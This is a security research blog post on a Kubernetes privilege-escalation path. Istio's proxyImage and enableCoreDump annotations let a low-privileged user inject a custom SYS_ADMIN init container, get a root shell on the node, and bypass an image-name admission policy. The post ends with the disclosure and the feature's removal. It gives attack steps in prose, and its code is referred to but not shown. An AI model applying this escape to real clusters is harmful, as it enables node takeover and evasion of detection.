Improving Kubernetes Security: Lessons from an Istio Configuration Finding

As a part of our ongoing work to secure cloud computing infrastructure, we delved into the inner workings of some popular Kubernetes add-ons. Our first subject of research was Istio, a popular service mesh add-on. 

Istio is an open-source service mesh for Kubernetes that manages communication between microservices. It provides traffic management, security, and observability features without requiring code changes. Istio simplifies complex networking tasks, enhances security, and offers detailed insights into service interactions, improving overall application reliability and performance.

Our research focused on leveraging features of said add-ons to either gain additional access, escalate privileges in the cluster, or hide malicious privileged workloads “in the noise” of a cluster by abusing various features to hide in plain sight. While looking into Istio, we wanted to list all of the avenues an attacker could take advantage of in order to gain control of a cluster following a successful exploitation of a workload.

In this blog post, we cover the Istio feature that we chose to focus on in our research: the ProxyImage annotation. We share our research process, findings, possible ramifications, and the disclosure and remediation process.

The Impact of K8s Add-ons on Security

Kubernetes add-ons are components that extend the functionality, scalability, security, and management capabilities of a cluster. Popular add-ons include Prometheus, Grafana, Istio, Linkerd, and Argo. If the cluster is a managed cluster such as EKS, add-ons exist to better integrate the cluster with AWS and help to offer easy methods to manage persistent volumes. Similar add-ons exist for other cloud providers as well.

When add-ons are installed, they often extend the capabilities of a cluster via operator patterns processing resources specified with custom resource definitions (CRDs). Other add-ons may utilize admission webhooks to modify workloads to conform with a desired pattern. Istio, for example, can be deployed in a way that will modify workloads to include components necessary for Istio to function. Each of these add-ons increases configurability and usability of the cluster but also increases the attack surface. Each of these new configuration options is a potential avenue that could be abused to gain additional access to a cluster. 

Istio Overview

Istio is an open-source, service mesh platform that helps organizations manage, secure, and observe microservices-based applications. A service mesh is a configurable infrastructure layer that sits between microservices, managing communication, security, and observability between them. It acts as a network of proxies that intercept and manage traffic between services. 

Istio provides a uniform way to connect, manage, and secure microservices, allowing developers to focus on writing code without worrying about underlying infrastructure. According to the main Istio page, “Istio extends Kubernetes to establish a programmable, application-aware network.”

Istio Details

Istio’s modus operandi is rather complex. When configured to operate in sidecar mode, it injects a sidecar container that acts as a transparent proxy grabbing all traffic in and out of the workload container. In addition to the sidecar container, an initialization container is created to modify the traffic flow of the underlying node in order for the proxy container to receive all ingress and egress traffic associated with the workload. The topology shaping is being done by a series of intricate iptables configurations, which, in turn, creates the appearance of a “flat network.” Naturally, such “network tricks” can cause errors, and in order to debug such errors, a cluster admin needs to have access to either an environment or some kind of tool that enables the admin to debug the setup, run arbitrary commands, and use tools to debug issues in the service mesh. Since we are discussing a Kubernetes cluster, and not a single Linux machine, having the proper infrastructure to run these debugging processes is more complex than usual for multiple reasons such as containerization, permissions, namespaces, etc. 

While exploring the Istio documentation, we found out there are various annotations that can be invoked by the user (a non-admin cluster user) in order to affect various resources inside the service mesh. There were two particular annotations that caught our eye.One is sidecar.istio.io/proxyimage, which allows us to specify which proxy image to use (with regard to a version of Envoy).

Figure 1. ProxyImage definition from the official Istio documentation Figure 1. ProxyImage definition from the official Istio documentation

However, this annotation could also be used to load a completely different image that has nothing to do with Envoy. We then wanted to see how we can use this annotation to do exactly that — load a different container, with our own set of tools along with “regular” workloads.

The second annotation is sidecar.istio.io/enableCoreDump, which was meant to run with privileged capabilities such as CAP_SYS_ADMIN.

Figure 2. enableCoreDump definition from the official Istio documentation Figure 2. enableCoreDump definition from the official Istio documentation

Amusingly enough, this annotation was added to Istio as a result of this issue, where a person wanted to debug a specific case that required taking a core dump to examine the memory of the proxy process. This feature was merged into Istio back in January 2020.

Figure 3. GitHub issue requesting enableCoreDump feature

Scenario Overview

Our scenario assumes that a vulnerable workload was exploited in order to get a shell on the pod that was running it. Once the attackers find themselves with a shell, they are fairly limited to what they can do on the pod that they have “landed on.” They only have access to whatever is installed on the pod without the ability to escalate privileges or run any tools in a convenient manner. Conceptually, the scenario would be the following:

  1. An attacker successfully exploits a web application that lands them in a shell on the pod.
  2. The attacker would then enumerate their Kubernetes privileges to see whether they can spin up a new container.
  3. The attacker would leverage Istio to run a debug container with a custom proxy image in order to spin up a new pod with CAP_SYS_ADMIN capabilities.

Scenario Details

When a workload is deployed, Istio will modify the init containers of the workload. It will run an initialization container called “istio-init” that runs with CAP_NET_ADMIN capabilities to modify the iptables of the underlying node so that all ingress and egress traffic related to the pod is sent through the “istio-proxy” container. Linux capabilities are a set of privileges that can be assigned to a process or user, allowing them to perform specific actions without requiring full root access. A full list of all capabilities can be found on the capabilities man page. If configured, a debug container can be created during the init process as well to troubleshoot the istio-init container. The debug container runs with CAP_SYS_ADMIN capabilities.

As a workload owner, you can influence the configuration applied by adding various annotations to the definition file. A full list of all of the available annotations can be found on the resource annotations documentation page (). Two annotations worth noting are sidecar.istio.io/enableCoreDump: "true", which enables the debug container, and sidecar.istio.io/proxyImage, which allows a workload owner to specify a custom Istio image. We found that this annotation also influences the image utilized by both of the initialization containers. 

With this annotation, we were able to request that Istio inject a privileged container into our pod and use the image we requested using the following YAML:

The core dump container has SYS_ADMIN capabilities but also drops all other permissions. This means that making a direct network call from this container is not possible. However, SYS_ADMIN does provide us the ability to escape to the host filesystem.

Through annotations, we can influence the image being utilized, but we cannot change the command used when the container starts (this is defined in the istio-sidecar-injector configmap in the istio-system namespace). This makes things slightly more complicated, but since we control the image, we can simply rename a malicious file as the command being invoked. In this case, the command being invoked by the core dump init container is: sysctl -w kernel.core_pattern=/var/lib/istio/data/core.proxy. We created a simple bash script:

And then, during the image build process, we overwrite the sysctl binary with our script:

We opted to utilize the “default” Istio proxy image as our base image so that the istio-init container responsible for running istio-iptables would work as expected. We could have utilized any other image, and then replaced the istio-iptables binary with a malicious file, but SYS_ADMIN capabilities are much more damaging than NET_ADMIN capabilities are.

To make our testing more realistic, we created a non-admin user account in the Kubernetes cluster. This is an account that has permissions to get, list, and create pods and standard get permissions to a handful of other things.

With all of the pieces in place, we built the image and then deployed our pod with the required annotations. After a minute, we had a root shell on the node.

It is considered best practice to utilize admission controls to prevent workloads from being admitted that have capabilities that could lead to container escapes or could do other harm to the cluster. This becomes challenging when add-ons such as Istio require elevated capabilities to operate. Kyverno published a blog post earlier this year showcasing how a Kubernetes admin might utilize an admission policy that allows Istio components to have elevated capabilities but prevents other workloads from utilizing them. However, even these examples need further work to close this gap. The example rule requires “*/istio/proxyv2*” be in the image name. This is easily bypassed by ensuring the malicious image meets this naming requirement. We bring this up not to point fingers at the Kyverno example policy but to showcase how attempting to limit workload capabilities, while allowing others to have elevated capabilities, is kind of like going down a rabbit hole of “what ifs.”  

Disclosure

On Friday, October 4, 2024, we reached out to the Istio security team over email detailing our findings and concerns. Our email was answered within 15 minutes (a new record), and a discussion about our findings was started. Istio’s security team disagreed with our findings (or even that there was an actual issue) due to the fact that a person with sufficient privileges could also spin up a privileged container regardless of Istio. While this argument is correct, spinning up a debug container with arbitrary code execution abilities under the guise of Istio can make its detection much more difficult in the case of an actual attack since an Istio debug container would seem much more legitimate than an unaccounted “regular” privileged container. It may also bypass controls limiting the usage of privileged containers on a cluster.

While the Istio team disagreed with us on the severity of our findings, they informed us that they had immediately opened a PR to drop this entire feature altogether. The PR was merged on October 7, 2024, to Istio’s main branch, removing the four-year-old feature.

Additional Resources

CrowdStrike 2025 Global Threat Report

CrowdStrike 2025 Global Threat Report

Get your copy of the must-read cybersecurity report of the year.